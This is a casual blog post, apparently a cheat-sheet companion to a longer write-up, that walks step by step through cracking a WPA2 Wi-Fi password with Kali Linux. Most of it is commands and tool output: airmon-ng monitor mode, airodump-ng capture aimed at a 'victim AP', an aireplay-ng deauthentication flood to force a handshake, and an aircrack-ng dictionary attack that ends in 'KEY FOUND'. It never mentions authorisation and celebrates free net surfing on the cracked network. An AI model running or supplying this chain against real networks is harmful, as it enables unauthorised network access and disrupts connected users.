Crack WPA2 with Kali Linux Dictionary Attack

Whazuuuuuup

Wazzzaaaap WiFi hackers! Here is the command Gist of the Crack WPA2 with Kali Linux writeup I wrote on the Hacker Realm on Sudorealm.com

Setup

Connect your Wireless Card dude, don't forget that!
Check if it is connected: ifconfig wlan0or iwconfig wlan0

Put the Card on Monitor Mode

[email protected]:~# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  448 NetworkManager
  525 dhclient
  654 wpa_supplicant

PHY	Interface	Driver		Chipset

phy0	wlan0		ath9k_htc	Atheros Communications, Inc. TP-Link TL-WN322G v3 / TL-WN422G v2 802.11g [Atheros AR9271]

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

And check if you are on monitor mode with iwconfig wlan0mon😉

Sniffing the air for targets

airodump-ng wlan0mon

Wait until your target pops up on the list and press ctrl+c to stop the monitoring.

Start targeted monitoring of your victim AP

airodump-ng --bssid 50:C7:BF:DC:4C:E8 -c 11 wlan0mon -w sudorealm

⚠ Do not Ctrl+C, you want that running until you catch a handshake.
Your target's bssid and the channel will be displayed on the generic monitoring you did before.
-w sudorealm will store the results of the monitoring in different files. You want a file named sudorealm_01.cap which has the handshake stored in it.

Deauthenticate victim to force a handshake Capture

➕ On a new terminal window.

aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 wlan0mon 

13:43:26  Waiting for beacon frame (BSSID: 50:C7:BF:DC:4C:E8) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
13:43:26  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:26  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:27  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:27  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:28  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]

You can change the -0 0 to -0 20 to Force the victim to disconnect and connect again.

Now wait until the other terminal shows this:

CH 11 ][ Elapsed: 7 mins ][ 2019-02-22 13:43 ][ WPA handshake: 50:C7:BF:DC:4C:E8  

WPA handshake of the victim AP. You are Set. 💪

Dictionary Attack to crack the Handshake

aircrack-ng sudorealm-01.cap -w Desktop/sudorealm.txt

Supposing you have some dictionaries somewhere in your system.
If you don't, here is a good start:

git clone github.com/danielmiessler/SecLists.git

Google that a bit and you'll thank me later.

00:00:00] 4/20 keys tested (316.73 k/s) 

      Time left: 0 seconds                                      20.00%

                         KEY FOUND! [ sudorealmRulez ]


      Master Key     : C3 3E A1 D6 E5 9E 58 66 B2 20 3E AC 27 90 44 E2 
                       06 17 91 76 B7 98 A7 3C 9D 61 67 32 99 95 72 0E 

      Transient Key  : EF 0B 80 7E 59 5A F4 15 51 4C 48 F8 62 7F 81 E7 
                       D8 E7 3F E3 0A D4 2C 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : D5 D4 EB 86 16 33 4F FC 2C 74 3C E6 DB AF 81 70 

The Password is Cracked, we are happy, and it's time for net surfing! 🏄‍♀️

Bam Boom hacked! 👩‍💻 Leave your comments below or find me @

🤖 https://www.reddit.com/user/stantz16 | The front page of the internet.

🐥https://twitter.com/DevThanos | The one that got hacked good.

🤵 https://www.linkedin.com/in/athanasios-stantzouris-34ba44141/ | Facebook but not facebook.

Thanks Yall 🎉🎈🥳

Zero Cool, Mess with the best, Die like the rest